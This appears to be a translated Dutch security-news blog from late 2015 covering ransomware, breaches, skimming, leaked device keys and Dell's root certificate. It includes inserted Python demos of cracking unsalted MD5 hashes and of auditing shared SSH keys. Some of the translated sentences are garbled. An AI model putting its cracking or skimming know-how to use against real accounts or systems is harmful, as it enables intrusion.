Tuesday, 1 December 2015

Linux Ransomware Encrypts 3000 Websites



In recent weeks, ransomware that targets Linux web servers has encrypted files on 3,000 websites. That is the estimate of the Russian anti-virus company Doctor Web, which bases the figure on data from Google. The ransomware is called Linux.Encoder.

The attackers behind the ransomware deliberately target WordPress websites and online stores running Magento. Through a still-unknown vulnerability they gain access to the web server hosting the site and then run Linux.Encoder. The ransomware encrypts all kinds of files and then demands one bitcoin, which at the current exchange rate is 349 euros. It is unknown how many webmasters have ultimately paid the ransom.

In early November F-Secure reported that about 36 people had paid, which at the time amounted to 12,000 euros. Because of a flaw in the ransomware, encrypted files can be decrypted without paying, and the Romanian anti-virus company Bitdefender has developed a free decryption tool for victims. Bitdefender's analysis shows that an early version of the ransomware was already being distributed on August 25 of this year, and that seven people paid the ransom at that time.

Monday, 30 November 2015

British Woman For 2.3 Million Euros Ripped Through Dating Scam


In Britain, a woman has been swindled out of 2.3 million euros through a dating scam. The woman met a man on a dating site who posed as a wealthy engineer. After the man had built a relationship with her, she was asked for various loans over a period of 10 months. In the end she transferred about 1.6 million pounds, the equivalent of 2.3 million euros.

Two members of the gang were sentenced last week. According to British police, internet scammers managed to steal a total of 5.7 million euros from the 100 victims of dating fraud analysed over the past year. People are not only at risk on dating sites: recently a British woman was approached via Skype and eventually swindled out of 360,000 euros.

British police advise internet users who talk with potential partners online to see through sob stories and not to be fooled by just a photo. People should also not send money to people abroad whom they have never met or barely know, and should keep questioning potential online partners when in doubt. Many scammers pay all sorts of compliments and ask many questions, but say little about themselves.

Sunday, 29 November 2015

NSA Stopped Mass Storage Phone Data


The US intelligence agency NSA has stopped its mass storage of telephone data, report news agency Reuters, CNN and The Intercept. In June, President Barack Obama decided to implement various reform measures and to limit the powers of the NSA.

As a result, the intelligence agency may no longer collect the phone records of US citizens indiscriminately. Instead, the NSA will have to work in a more targeted way: a court order is required first, after which telecom operators may be asked to retain the phone records of specific people or groups of people for a maximum period of six months.

The measure is a victory for privacy advocates and for Edward Snowden, who felt that the NSA had too much power to spy on citizens. However, the NSA has asked the court to be allowed to keep using the data stored so far, on a limited scale, until February 29, 2016. The judge has yet to rule on this.

Major Security Flaws In Hacked Toy Manufacturer VTech


VTech, the Chinese manufacturer of educational toys from which the data of 4.8 million adults and 200,000 children were recently stolen, had not properly secured its customer data, according to the Australian security expert Troy Hunt, who analysed the stolen customer data.

An attacker recently managed to gain access to the customer database and approached Vice Magazine. The magazine's journalist then contacted Hunt to verify the data. Hunt was sent several files, the largest of which was 1.7 GB. In this file, called parent.csv, he found the details of 4.8 million people: e-mail addresses, names, IP addresses, postal addresses and encrypted passwords. The passwords turned out to be hashed with the MD5 algorithm. They are therefore not directly readable, but MD5 has long been considered unsafe for this purpose because such hashes are easy to 'crack', so an attacker can still recover the passwords.

VTech had not taken additional measures to protect the passwords, such as the use of "salts" and "stretching". That is not the only security problem, says Hunt. The website does not use SSL, so all communication, including passwords, takes place unencrypted. There is no cryptographic protection of sensitive data, the expert noted. The website also appears to return a SQL statement in the login response. The attacker said he had got in via SQL injection, a problem that has been known since 1998 but is still ignored by some companies. Finally, Hunt criticises the extensive use of Flash on VTech's website.
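To show concretely why an unsalted MD5 hash is "easy to crack" and what the missing "salts" and "stretching" would have changed, here is an added illustration in Python. It is not code from Hunt's analysis or from VTech; the five-word password list and the user records are constructed for the demo, and the hardened scheme uses PBKDF2-HMAC-SHA256 from the standard library as one common choice of stretching function.

```python
"""Unsalted MD5 versus salted, stretched password hashing.
Added illustration for the VTech passage; not code from the breach
analysis or from VTech. Wordlist and user records are constructed."""
import base64
import hashlib
import hmac
import os

# Constructed stand-in for the dictionaries that cracking tools use;
# real lists contain hundreds of millions of entries.
COMMON_PASSWORDS = ["password", "123456", "qwerty", "letmein", "iloveyou"]


def md5_hex(password: str) -> str:
    """The scheme found in the dump: one unsalted MD5 per password."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def build_lookup_table(wordlist) -> dict:
    """Hash every candidate once. Without a salt, the same table
    cracks every user in the dump, which is what makes MD5 cheap to break."""
    return {md5_hex(w): w for w in wordlist}


def crack_unsalted(hashes, table) -> dict:
    """Map leaked hashes back to passwords by dictionary lookup."""
    return {h: table[h] for h in hashes if h in table}


# Hardened scheme: per-user random salt plus key stretching (PBKDF2).
ITERATIONS = 200_000  # stretching factor: cost of each guess, tune to hardware


def hash_password(password: str, salt=None) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt_b64>$<hash_b64>'."""
    if salt is None:
        salt = os.urandom(16)  # unique per user, so no shared lookup table
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return "pbkdf2_sha256$%d$%s$%s" % (
        ITERATIONS,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_b64, hash_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(hash_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iters))
    return hmac.compare_digest(dk, expected)


def demo() -> dict:
    """Constructed user records, hashed both ways."""
    users = {"alice": "password", "bob": "letmein", "carol": "Tr0ub4dor&3"}
    leaked_md5 = {u: md5_hex(p) for u, p in users.items()}
    cracked = crack_unsalted(leaked_md5.values(), build_lookup_table(COMMON_PASSWORDS))
    stored = {u: hash_password(p) for u, p in users.items()}
    return {
        # two of three users fall to a five-word list against unsalted MD5
        "cracked_from_md5": sorted(cracked.values()),
        # same password, different salt: no shared table is possible
        "salted_differ": hash_password("password") != hash_password("password"),
        "verify_ok": verify_password("password", stored["alice"]),
        "verify_wrong": verify_password("Password", stored["alice"]),
    }


if __name__ == "__main__":
    print(demo())
```

The salt defeats precomputed tables because every user must be attacked separately, and the iteration count multiplies the cost of each guess by ITERATIONS; neither changes how a correct password is verified, which is why the migration is cheap for the site and expensive for the attacker.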

Hunt also runs the website Have I Been Pwned, where internet users can check whether they appear in databases from hacked websites. The data of the 4.8 million adults from VTech's database have now been added there. That does not apply to the data of the 227,000 children that were also among the stolen data; Hunt has not added those. VTech has confirmed the break-in, but does not know how the attacker managed to get in.

Saturday, 28 November 2015

Criminals Copy Debit Cards Via Stereo Skimming


In the past quarter, criminals in a European country copied debit cards via stereo skimming, reports the European ATM Security Team (EAST), an organisation that tracks fraud at ATMs and payment terminals. EAST receives data from a large number of countries.

It is the first time that the organisation has received a report of stereo skimming being applied successfully. In traditional skimming, criminals copy the magnetic stripe of a debit card using a false card slot placed over the ATM's card reader. To prevent skimming, anti-skimming devices are used that emit a "jamming signal". In stereo skimming there are two read heads that read information from the magnetic stripe and store it using audio technology. The first read head picks up both the jamming signal and the card data, while the second read head records only the jamming signal. By subtracting the one from the other, the card data remains.

Thanks to MP3 technology, this method is said to be making a comeback, according to InformationWeek. The technique has been used before: in 2013 a simple stereo-skimming device was discovered on an Irish ATM. In late September of this year, security firm TMD Security reported that it had found new stereo-skimming technology in Ireland. The device is said to be based on existing stereo-skimming technology, but to use sophisticated new techniques that allow the jamming signal to be neutralised.

In the present report EAST does not say from which country the report came, but Ireland is one of the countries that supply data to the organisation. Stereo skimming still appears to be a rarity, since 17 countries reported traditional skimming of debit cards. One country also reported criminals who had withdrawn money from an ATM via malware, and a 'black box attack' was reported as well, in which criminals connect their own device to the ATM and use it to command the machine to dispense cash through the cash dispenser.

Leak VPN Providers Can Reveal IP Address Users


A vulnerability at some VPN providers can cause the real IP address of users to be revealed, warns VPN provider Perfect Privacy. A VPN (Virtual Private Network) is a secured connection between a computer and a server elsewhere on the internet.

The connection is encrypted, so others cannot observe it. All internet traffic to and from the computer passes through this shielded route and cannot be intercepted on that leg. VPN users can also hide their IP address this way, as the websites they visit only see the IP address of the VPN provider. According to Perfect Privacy, however, users of some VPN providers still run the risk of their real IP address becoming known.

Port forwarding

The problem affects VPN providers that offer port forwarding. It does not matter whether the VPN users themselves use port forwarding; only the attacker needs to have it set up. Several conditions must be met to determine a victim's IP address. The attacker must have an active account with the same VPN provider as the victim, must know the victim's 'exit' IP address, and must get the victim to open a file or page.

An attacker with port forwarding enabled can then see the request for the image or website and read the victim's real IP address from it. Perfect Privacy tested nine VPN providers in total, five of which were found to be vulnerable. These parties have been notified. The problem may also exist at VPN providers that were not tested, warns Perfect Privacy.

BitTorrent

According to security expert Darren Martyn, the leak can be used to expose BitTorrent users who illegally download copyrighted material. Some BitTorrent users use a VPN service to hide their IP address, but because of the leak rights holders can still see the IP addresses of illegal downloaders. Martyn expects that companies that specialise in suing copyright infringers will use this vulnerability to go after BitTorrent users.

Hacked Site Reader's Digest Spread Malware


Attackers have managed to hack the website of Reader's Digest and are now using it to spread malware, warns anti-malware company Malwarebytes. According to the company, the number of hacked WordPress websites is increasing, and Reader's Digest is one of them.


Code is placed on the hacked websites that silently forwards visitors to a page hosting the Angler exploit kit. This exploit kit uses known vulnerabilities in Adobe Flash Player and Internet Explorer that users have not patched. If the attack succeeds, the Bedep Trojan is installed on the computer, which in turn can install additional malware.

Malwarebytes warned Reader's Digest a few days ago but received no response, and when a blog post about the infection appeared online yesterday the website was still distributing malware.

Registry Hack Turns Windows Defender Into "Adware Killer"


Yesterday Microsoft announced that it has given its business security products a new feature that also stops potentially unwanted software and adware, but with a small change to the registry this function can be activated by consumers as well.

So reports the German Heise Online. By potentially unwanted software Microsoft means software bundles containing adware, toolbars and other unwanted programs. To protect organisations against it, the software giant has given its business solutions System Center Endpoint Protection (SCEP) and Forefront Endpoint Protection (FEP) a new opt-in feature. In conjunction with Windows Defender, the download and installation of unwanted software can thus be blocked.

The feature is not exclusive to business environments: with a change to the registry it is also available on ordinary Windows systems. According to Heise Online, the adware-blocking function has not only been added to SCEP and FEP but also to Windows Defender, which is present in all Windows versions since Windows 8. In a test by the German IT magazine, Windows Defender did indeed block unwanted software such as Freemake Video Converter after the change. The test was performed on the Home and Pro editions of Windows 10.

To make the change, put the text below into a text file and then change the file extension from .txt to .reg. Opening the file then applies the registry change.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine]
"MpEnablePus"=dword:00000001

Friday, 27 November 2015

Microsoft Protects Companies From Unwanted Software


Microsoft has given its business security products a new feature to protect businesses and organisations from potentially unwanted software. This includes, for example, so-called software bundles containing adware, toolbars and other unwanted programs.

According to the software giant, such programs can increase the risk of corporate networks becoming infected with malware or make malware infections harder to identify. They also burden helpdesks, and removing the applications is time-consuming. To protect corporate users from this kind of software, the security solutions System Center Endpoint Protection (SCEP) and Forefront Endpoint Protection (FEP) have been given a new opt-in feature, Microsoft disclosed in a blog post.

The feature can detect and stop potentially unwanted programs so that they are not downloaded or installed. Microsoft says that blocking such software should be an explicit choice, and that companies would be wise to set a policy for it. End users should also be informed, so they know that potentially unwanted programs are not allowed in the working environment and that the security products will block such software.

FBI Warns Online Shoppers About Online Fraud


With the holidays approaching, the FBI has warned online shoppers about internet fraud, such as offers that are too good to be true. According to the police service, criminals are preparing for the holidays and will try to steal both money and private information through creative scams.

Internet users are advised not to fall for offers that seem too good to be true, and to avoid websites that offer steep discounts. Consumers should also be careful on social media and when installing smartphone apps, according to the FBI. Before downloading an app from an unknown source, users should first read the reviews. Some apps pose as free games but in reality try to steal all kinds of personal information.

Besides the FBI, the US government's Computer Emergency Readiness Team (US-CERT) has also warned internet users about phishing, malware and other scams during the holidays. Among other things, it recommends paying for online purchases by credit card because that provides extra protection, and keeping a printed record of all online transactions until the purchased products arrive.

EFF Wants Stronger Encryption Against Terrorists And Criminals



If the government were to ask people to remove the good locks on their doors and windows and replace them with worse ones so that government employees could get in more easily in case someone is a terrorist, nobody would accept this, because bad locks make everyone vulnerable.

Yet this is exactly what governments and law enforcement agencies want in the case of encryption, according to the American civil rights organisation EFF. Agencies like the FBI regularly argue for adding backdoors to encryption so that encrypted communication can still be tapped. That is comparable to preventing people from getting good locks and preventing locksmiths from making them.

In that last example most people would understand that it is not a wise idea, says Cindy Cohn of the EFF. But when it comes to the internet and technology, such as how encryption works, this is less clear to many people. Parties such as the FBI and politicians should know better, says Cohn. "The answer to insecure networks and digital technologies must be to make them more secure."

But that is not what is happening, she continues, and she urges policymakers to take this into account. "Making sure everyone's door is unlocked is not the answer to crime or terrorism. The answer is developing and supporting better security," Cohn concludes.

Ransomware Irritates Users Via Audio Message



Besides ransomware that encrypts files or locks computers, there is also ransomware that targets only the browser, and a new variant tries a different way to force users to pay. This browser ransomware pretends to be "Microsoft Official Support".


A pop-up makes users believe that there are problems with their computer and that a phone number must be called. In addition, an audio message is repeated continuously stating that there are viruses and adware on the computer and that the given number must be called to remove them. If users try to close the pop-up, a new pop-up opens.

Unlike ransomware that encrypts files or locks the computer, browser ransomware is easy to get rid of. Users can close the browser using Task Manager, after which the browser ransomware disappears as well. Security firm RSA says that despite the simplicity of the solution, this ransomware targets users who have no knowledge of this type of threat or of how to remedy it via Task Manager, and who end up calling the telephone number provided. The number connects the victim to scammers who then try to fleece them.

FBI Suspect In Case Of 1.2 billion Stolen Logins


The FBI has a suspect in the case of 1.2 billion stolen usernames and passwords. Last August the US firm Hold Security announced that it had uncovered a gang that had stolen 1.2 billion unique passwords from about 420,000 websites through SQL injection.

Investigation documents from the FBI show that the agency has found an e-mail address that may be linked to the theft. The e-mail address was registered in 2010 by one "mister gray", who offered spam services. As part of the investigation, the FBI discovered a message on a Russian hacking forum from one "mr.grey" who in 2011 offered login details of Facebook, Twitter and UK users. The information comes from a warrant request the FBI submitted last year to search the e-mail account and its data, which became public last week and which news agency Reuters reported on. Further details about the state of the investigation are lacking.

IT Vendor LANDesk Warns Staff After Hack


The American IT vendor LANDesk has warned staff that their data may have been stolen in a break-in on the network, but LANDesk employees say that the hack goes much further and that source code may also have been stolen. LANDesk develops software for computer management.

The company recently issued a warning that suspicious activity had been detected on its IT systems and that employee data may have been stolen. The IT vendor will not give details, but says that the environments of customers using LANDesk software are not at risk. Several employees told IT journalist Brian Krebs that the attackers may have had access to the systems since June 2014, as is apparent from the logs.

The break-in was only discovered after an employee complained about a slow internet connection. The investigation also showed that the attackers had compromised the IT manager's passwords and system passwords. Lists were also found of source code and build servers that the attackers had compiled. With the source code it could be easier for attackers to find vulnerabilities in the software and use them to attack companies. A spokesman, however, would neither confirm nor deny that source code was taken in the break-in.

Thursday, 26 November 2015

Millions Of Vulnerable Devices By The Same Encryption Keys


Researchers warn that millions of devices such as internet routers, IP cameras and modems are vulnerable because they use the same encryption keys. Attackers can therefore carry out man-in-the-middle attacks and eavesdrop on and decrypt encrypted traffic.

Sensitive information could thus end up in the wrong hands. The problem concerns so-called embedded devices, including routers, modems, IP cameras and VoIP phones. For their research, researchers from security firm SEC Consult examined the firmware of more than 4,000 such devices from more than 70 manufacturers.

They looked mainly at cryptographic keys in the firmware, such as public keys, private keys and certificates. These are mainly keys used for SSH connections and X.509 certificates used for HTTPS. In total, more than 580 unique private keys were found in the 4,000 devices studied.

This information was then correlated with data from large-scale internet scans. It emerged that the dataset of 580 unique keys contains the private keys of 9% of all HTTPS web hosts and of more than 6% of all SSH hosts. At least 230 of the 580 keys were actively in use and seen on millions of hosts.

The keys are added by manufacturers to enable connections over HTTPS and SSH. The problem is that all devices running the same firmware use the same keys. Remarkably, the same keys were found in the products of different manufacturers. For example, a Broadcom certificate was found on more than 480,000 devices on the internet, including Linksys and ZyXEL models. The problem also occurs at Cisco, Huawei, Ubiquiti Networks and other vendors. Most of the vulnerable devices are in the United States (26.3%) and Mexico (16.5%).

Solution

SEC Consult has worked with the CERT Coordination Center (CERT/CC) at Carnegie Mellon University to warn the manufacturers involved and browser developers. Some parties have since released updates. Manufacturers are advised to use unique cryptographic keys for each device, and internet service providers should ensure that remote access to their subscribers' equipment over the WAN port is not possible. Finally, end users are advised to replace the generic SSH keys and X.509 certificates on their devices with unique ones. However, CERT/CC notes that in many cases no practical solution is available.
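The research method described above (fingerprint the keys found in firmware, then correlate them with scan data to see how many hosts share each key) is also the check an operator can run on their own device inventory to find the generic keys that the advice says to replace. The Python below is an added example for the key-correlation passage and the Solution section; it is not SEC Consult's or CERT/CC's tooling. It builds OpenSSH-format `ssh-rsa` public key lines from arbitrary numbers (constructed, not real key material), computes the same SHA256 fingerprint `ssh-keygen -lf` prints, and groups constructed scan records by fingerprint to flag keys shared across many hosts and vendors.

```python
"""Detect SSH host keys shared across many devices, the condition SEC Consult
found by correlating firmware keys with internet-scan data. Added example;
not SEC Consult's or CERT/CC's tooling. All key blobs and scan records below
are constructed for the demo and are not real device keys."""
import base64
import hashlib
import struct
from collections import defaultdict


def _ssh_string(b: bytes) -> bytes:
    """SSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(b)) + b


def _ssh_mpint(n: int) -> bytes:
    """SSH wire 'mpint': minimal big-endian magnitude, 0x00-prefixed when the
    top bit is set so the value reads as positive."""
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if b and b[0] & 0x80:
        b = b"\x00" + b
    return _ssh_string(b)


def make_rsa_pubkey_line(e: int, n: int, comment: str) -> str:
    """Assemble an OpenSSH 'ssh-rsa AAAA... comment' line from (e, n); the
    blob layout is string "ssh-rsa", mpint e, mpint n (RFC 4253)."""
    blob = _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode() + " " + comment


def fingerprint(pubkey_line: str) -> str:
    """OpenSSH-style fingerprint: SHA256 of the decoded blob, base64 without
    '=' padding, as 'ssh-keygen -lf' prints it."""
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def shared_keys(scan_records, min_hosts=2):
    """Group scan records by host-key fingerprint and report every key seen on
    at least min_hosts distinct hosts, with the vendors it spans. A key that
    crosses vendors is the pattern the researchers flagged."""
    by_fp = defaultdict(list)
    for rec in scan_records:
        by_fp[fingerprint(rec["hostkey"])].append(rec)
    report = {}
    for fp, recs in by_fp.items():
        hosts = {r["ip"] for r in recs}
        if len(hosts) >= min_hosts:
            report[fp] = {"hosts": len(hosts),
                          "vendors": sorted({r["vendor"] for r in recs})}
    return report


# Constructed keys: the moduli are arbitrary numbers, not RSA key material.
KEY_SHARED = make_rsa_pubkey_line(65537, 0xB4D1DEA5C0FFEE0123456789ABCDEF, "fw-1.2.3")
KEY_UNIQUE = make_rsa_pubkey_line(65537, 0xD15EA5E5BADC0DE9876543210FEDCBA, "per-device")

# Constructed scan records; IPs are from the RFC 5737 documentation ranges.
SCAN_RECORDS = [
    {"ip": "192.0.2.10", "vendor": "Linksys", "hostkey": KEY_SHARED},
    {"ip": "192.0.2.11", "vendor": "Linksys", "hostkey": KEY_SHARED},
    {"ip": "198.51.100.5", "vendor": "ZyXEL", "hostkey": KEY_SHARED},
    {"ip": "198.51.100.6", "vendor": "ZyXEL", "hostkey": KEY_SHARED},
    {"ip": "203.0.113.7", "vendor": "Acme", "hostkey": KEY_UNIQUE},
]


def audit():
    """Run the shared-key check over the constructed records."""
    return shared_keys(SCAN_RECORDS)


if __name__ == "__main__":
    for fp, info in audit().items():
        print(fp, info)
```

On a real inventory the `hostkey` field would come from `ssh-keyscan` output or the `known_hosts` lines of a management host; any fingerprint the report lists on more than one device is a factory key that should be regenerated, and one that spans vendors points at a shared firmware component.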

Hacker Creates Tool That Disables Chip & Pin



The well-known hacker Samy Kamkar has developed a new tool with which he can disable the Chip & PIN feature on credit cards and which can emulate credit cards and magnetic stripes. In this way, all of a person's credit cards and magnetic stripes can be stored on one device.



MagSpoof, as Kamkar calls his creation, can also predict American Express credit card numbers and expiry dates. This requires a full credit card number, but it does not matter whether that number was reported lost or stolen in the past. MagSpoof generates a strong electromagnetic field that emulates a traditional magnetic stripe card. Kamkar notes that MagSpoof does not make it possible to use other people's credit cards. Moreover, the hacker has not included the ability to predict American Express numbers or to disable Chip & PIN in the version he has released.

The device is therefore primarily intended for research into magnetic stripes, microcontrollers and electromagnetism. During the development of MagSpoof, Kamkar discovered that he could also disable the Chip & PIN feature of a card. When users pay with a Chip & PIN card using its magnetic stripe, the payment terminal says the user must "dip" the card for added security.

The information that a card has Chip & PIN is stored on the magnetic stripe, and Kamkar discovered that he can alter it. As a result, dipping is no longer required for a Chip & PIN card and the transaction simply goes through, which bypasses the security measure. To help researchers, Kamkar has published the MagSpoof blueprint as well as the software and the required components. According to the hacker, the device is easy to assemble from an Arduino and other common parts.

Tor Project Asks For First Time Donations


The Tor Project, the organisation that maintains the Tor network and Tor Browser, is for the first time actively asking internet users for donations. The website already had a donate button, but now donors who want to contribute to the development of the Tor network are being actively sought.


A large part of the Tor Project's revenue comes from the US government. To avoid depending too much on this funding alone, it has now decided to launch a crowdfunding campaign. Since crowdfunding comes without restrictions, the money raised can be spent on the projects the Tor Project considers most important, and the organisation can respond quickly to changing circumstances.

Through the Tor network, internet users can hide their IP address and visit censored websites. It is used daily by 2.5 million people, including people living under totalitarian regimes. The Tor Project describes itself as an American non-profit organisation focused on research, development and education in the area of online anonymity and privacy. Although many people surf the internet daily via Tor Browser and the Tor network, the donation button on the website has been used fewer than 8,000 times in previous years.

Apple Users Slow To Install iOS Updates


Apple users are slow to install iOS updates: a week after the release of iOS 9, 86% of iPhone and iPad users had still not upgraded. That is what the US security firm Duo Security states on the basis of its own research.

By the end of the second week after the release of iOS 9, 25% of users had installed the new iOS version. A month after the launch of iOS 9, around 40% of the users studied had switched. It also emerged that many users run very outdated versions such as iOS 7 or older, which according to Duo Security poses serious security risks.

The latest iOS versions fix several vulnerabilities that allow an attacker with physical access to bypass the screen lock, making it possible to gain access to messages, view photos or bypass other security measures. Organisations are therefore advised to emphasise the importance of updates to their iOS users, especially given how easy iPads and iPhones are to update.

Linux Ransomware Demands $999 For Decryption



A new variant of the ransomware that targets Linux web servers asks $999 for decrypting the encrypted files, but lets Russian victims have their files decrypted by the cybercriminals free of charge.

Linux.Encoder, as the ransomware is called, targets WordPress websites and web shops running on Magento. Exactly how the attackers get in is still not clear. Once active, Linux.Encoder encrypts all kinds of files on the server. Initially the ransomware asked $50 to decrypt the files, but that rose to $500. The newly discovered variant asks $999 for decryption and wants victims to pay within seven days.

The creators also appear to make an exception for Russian victims, reports anti-malware company Malwarebytes. In one case a message in Russian was discovered, stating that if the website is Russian, the files can be decrypted for free. According to Malwarebytes, the attacks are probably automated, and this is how compatriots of the attackers whose website was inadvertently encrypted can recover their files free of charge.

Another Teen Arrested For Attack On TalkTalk


The British authorities have again arrested a teenager over the attack on the ISP TalkTalk. In the attack, the data of more than 156,000 customers were stolen. In total five people have now been arrested, including four teenagers. The latest arrest is an 18-year-old boy from Wales.

He is suspected of blackmail. Shortly after the break-in at the British internet provider was announced last month, its chief executive said that the company was being extorted by the attackers. Further details about the fifth suspect have not been given. Besides the 18-year-old boy, a 20-year-old man, two 16-year-old boys and a 15-year-old boy are suspected of involvement in the attack. Three of them will be questioned again next March. Because of the break-in, of which it is still not known how it occurred, TalkTalk decided to give all subscribers a gift.

Wednesday, 25 November 2015

Dell Software Installs Dangerous Root Certificate


Users of Dell computers have again been warned about a dangerous certificate that a program from the computer manufacturer installs on laptops, desktops and tablets, and which cybercriminals can use to attack the system.

So warns the CERT Coordination Center (CERT/CC) at Carnegie Mellon University. Initially the warning concerned Dell Foundation Services, which installs a root certificate called eDellRoot together with its private key. Now it turns out that Dell System Detect also installs such a root certificate with the corresponding private key. This certificate is called DSDTestProvider.

Dell System Detect (DSD) is a program that users are supposed to run and that communicates with the Dell support page. On some systems DSD is installed by default. The program installs a root certificate along with its private key. An attacker can use that key to generate certificates signed by the DSDTestProvider certificate authority.

Systems that trust the DSDTestProvider certificate authority will also trust certificates issued by it. An attacker can thus impersonate websites and other services, sign software and e-mail, and decrypt network traffic and other data. This enables, among other things, man-in-the-middle attacks on HTTPS traffic and the installation of malware. CERT/CC recommends revoking the root certificate, which can be done via the Windows Certificate Manager.

Hilton Hotel Chain Discovered Malware On POS Systems


The Hilton hotel chain has warned customers that their credit card information may have been stolen after malware was detected on several of its POS systems. The malware was designed to steal cardholder names, credit card numbers, security codes and expiry dates.

Address details and PINs were reportedly not captured. The malware was active from November 18 to December 5 last year and from April 21 to July 27 of this year. Customers who used their credit cards at a Hilton Worldwide hotel during these periods are advised to check their statements. The chain does not know how many credit cards may have been compromised or how the POS systems became infected. The malware was eventually discovered through the chain's own systems.

Hilton further states that customers are generally not liable for fraudulent activity on their cards and should notify their bank if they find irregularities. The chain is also offering customers a year of free credit monitoring. The malware has reportedly been removed and the security of the hotel systems tightened.

Lenovo Used Insecure Password For Admin Account


Computer manufacturer Lenovo has released an update for its System Update tool that fixes two critical vulnerabilities which could allow a local attacker to gain system or administrator rights. The software is installed on most Lenovo computers and checks for new versions of drivers and other software; users can also download and install updates with it.

The first issue (pdf) in the System Update tool concerned the temporary administrator account that Lenovo creates. This account was generated with a predictable name and an insecure password, allowing a local user to gain admin privileges. The second problem (pdf) concerned a permissions problem that allowed a local unprivileged user to execute Windows commands with system privileges.

Both vulnerabilities were discovered by security firm IOActive in October and reported to Lenovo in early November. The computer manufacturer released an update to the System Update tool last week, 17 days after the notification. The details of the vulnerabilities have now been made public, including a proof-of-concept that demonstrates one of the attacks. Lenovo users are advised to install version 5.07.0019 or later of the System Update tool.

More Dangerous Certificates On Dell Computers Discovered



Dell computers turn out to contain more dangerous certificates than just the eDellRoot root certificate that has been the subject of warnings since yesterday and that allows users to be attacked. So reports the security firm Duo Security on the basis of its own research.

Dell turns since August computers to install the same root certificate called eDellRoot, including associated private key.Something that, according to researchers at Duo Security is a pretty big mistake. " Using the certificate can be man-in-the-middle attacks against users are executed and it is for example possible to install malware or encrypted connections to eavesdrop. In addition, there appears to be a second eDellRoot certificate. The second license was found on 24 IP addresses. Which models are exactly is unknown.

"It suggests that Dell is deliberately shipping identical keys in other models. This is a blatant disregard for basic cryptographic security," the researchers said. One of the systems that was reachable from the internet and used the certificate to offer web services over HTTPS was a SCADA system. Such systems are used, among other things, in vital infrastructure.

Finally, an Atheros Authenticode certificate for signing software was also found. The password protecting the certificate was cracked within six hours. The certificate turned out to have already expired, which limits the possibilities for abuse, although it appears to have been in use while it was still valid.

Manufacturers Do Not Learn

According to the researchers the discovery points to a disturbing trend among manufacturers. Adding trusted certificates to a system, and especially root certificates, exposes users to unnecessary risks. "Unfortunately it appears that manufacturers do not learn from past mistakes and keep repeating them," the research (pdf) concludes. Dell has since indicated that the eDellRoot certificate will be removed via an update.

Britons Arrested For Malware Scanning Service


British police have arrested two people for offering services that let criminals scan and encrypt their malware. The suspects, a 22-year-old man and a woman from Colchester, were arrested after an investigation by the UK National Crime Agency and Trend Micro.

Through a website the two offered various services, both free and paid, that let malware authors scan their files to check whether virus scanners recognised the malware. If anti-virus software did detect it, a service was offered to make it undetectable through encryption. Malware creators could buy a licence in advance. Statistics on the website indicated that more than 1.2 million scans had taken place since February of this year.

Dell Will Remove Dangerous Certificate Of Computers



Computer manufacturer Dell will begin today with the removal of a certificate that allows its users to be attacked, the company has announced. Since August of this year Dell laptops and desktops have shipped with a certificate whose private key is included.

Attackers can use that key to sign malware so that it appears to come from Dell, and man-in-the-middle attacks on HTTPS sites are also possible. According to Dell the certificate is neither malware nor adware; it was deliberately placed on systems to help customers. Through the certificate Dell's help desk can read the system's service tag and quickly identify the computer model, operating system and other components.

In a blog posting the manufacturer states that the certificate inadvertently introduces vulnerabilities, something Dell apologises for. The company has put online instructions (docx) on how the certificate can be removed and will also release an update starting today to remove it. All new systems will be delivered without the certificate. In the blog posting Dell also thanked researchers Hanno Böck, Joe Nord and Kevin Hicks, who published about the problem. Dell customers who want to know whether they are vulnerable can test this via this website.

Update

"The security and privacy of our customers are of utmost importance to Dell. The recent situation relates to an "on-the-box" support certificate intended to provide customers a better, faster and simpler support experience. Unfortunately the certificate introduced an unintended security vulnerability, which Dell regrets. To solve this problem we will provide our customers with instructions to remove this certificate permanently from their systems."

"We will communicate the instructions via email, on our support website and via our technical support, and we will remove the certificate from all Dell systems going forward. Please note: business customers who image their own systems are not affected by this issue. Dell does not install any adware or malware. The certificate will not reinstall itself once it is properly removed according to the process recommended by Dell."

The CERT Coordination Center (CERT/CC) at Carnegie Mellon University has also issued a warning about the certificate and likewise recommends removing it.

Tuesday, 24 November 2015

Adware Disables Security Software Via Certificates


An adware family that has been active for several years is using a new trick to disable virus scanners and other security software on infected computers, which is why it is now classified as a trojan. Once active, the adware starts a variety of tasks that show advertisements on the computer.

In addition all shortcuts on the desktop, taskbar and Start menu are modified. What is new is that the adware marks 13 certificates of anti-virus companies, including Avast, AVG, BitDefender, McAfee and Malwarebytes, as 'not trusted', so that applications signed with those certificates can no longer be started. Because of this method anti-malware company Malwarebytes decided to classify the adware henceforth as a trojan.

German Government: TrueCrypt Still Suitable For Encryption


The popular encryption software TrueCrypt is still suitable for encrypting files, according to the German government, on the basis of a study (pdf) conducted by the renowned Fraunhofer Institute. Last year the developers of the software decided to cease support.

They also advised against continued use of the software. The German Federal Office for Information Security (BSI), part of the German Ministry of the Interior, therefore commissioned the Fraunhofer Institute to investigate TrueCrypt for vulnerabilities. The encryption software had in fact also been recommended for encrypting confidential information.

According to the researchers TrueCrypt is still suitable for encrypting data on storage media. "Especially in mobile scenarios, such as the use of laptops or USB storage, disk encryption or encrypted containers are very important for protecting critical data," said Thomas Caspers of the BSI. The researchers do note several problems; for example, TrueCrypt's use of cryptography is not optimal.

